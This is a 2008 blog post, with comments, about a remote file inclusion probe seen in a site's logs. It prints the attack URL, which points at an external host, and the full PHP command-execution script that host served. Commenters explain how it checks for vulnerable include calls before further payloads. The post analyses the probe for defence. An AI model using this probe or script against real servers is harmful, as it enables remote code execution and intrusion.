Thursday 13 March 2008 — This is almost 17 years old. Be careful.
One of the things I find entertaining about monitoring web sites is to see the trails of malware. Yesterday, there were a few attempts to request pages from our site with a query parameter added on, for example:
blah/blah?p=http://www.mambembrincantes.com/site/safeon.txt??
I visited that odd URL to see what I could find out, and discovered a plain text file containing PHP code. This is the code (formatted so I could read it):
<?php
echo "31337:";
$cmd = "id";
$eseguicmd = ex($cmd);
echo $eseguicmd;
function ex($cfe) {
$res = '';
if (!empty($cfe)) {
if (function_exists('exec')) {
@exec($cfe, $res);
$res = join("\n", $res);
}
elseif (function_exists('shell_exec')) {
$res = @shell_exec($cfe);
}
elseif (function_exists('system')) {
@ob_start();
@system($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif (function_exists('passthru')) {
@ob_start();
@passthru($cfe);
$res = @ob_get_contents();
@ob_end_clean();
}
elseif (@is_resource($f = @popen($cfe, "r"))) {
$res = "";
while (!@feof($f)) {
$res .= @fread($f, 1024);
}
@pclose($f);
}
}
return $res;
}
exit;
?>
I’m not sure what the heck is going on here. The script looks like it’s trying to accept a command and execute it, except the command is hardcoded to “id”. And what good does it do to hit my server with this URL in a ?p= parameter? Is there some vulnerability somewhere so that a server sent this URL will fetch this PHP and execute it? Is this part of a server-based virus? What good does it do if the command is always “id”? So many questions...
Comments
Maybe this script is just a test, and if 'id' executes, they can always include the 'real' malware script (and keep the spying eyes of vigalent sysadmins out of it).
*these days, it's thankfully restricted on most systems.
The hope os that your system uses a system that does an include($p) style call at some point.
Insecurely built PHP systems could then attempt to include the remotely hosted php code, and execute it.
If the vulnrability exists, it would expect to get back the user id of the user running the php / web server process. If that is apache or wwwuser or something they know that the system is vulnerable, but the user is restricted (although it would allow all forms of website hacking, but no total box ownership unless they have a local privelge escalation exploit), if the user is root, they've hit jackpot.
Once they have determined if your server is responsible, they would probably make a second request to include a different script with a different payload, either firing up an ssh tunnel out, or installing a rootkit.
Hope that helps
Add a comment: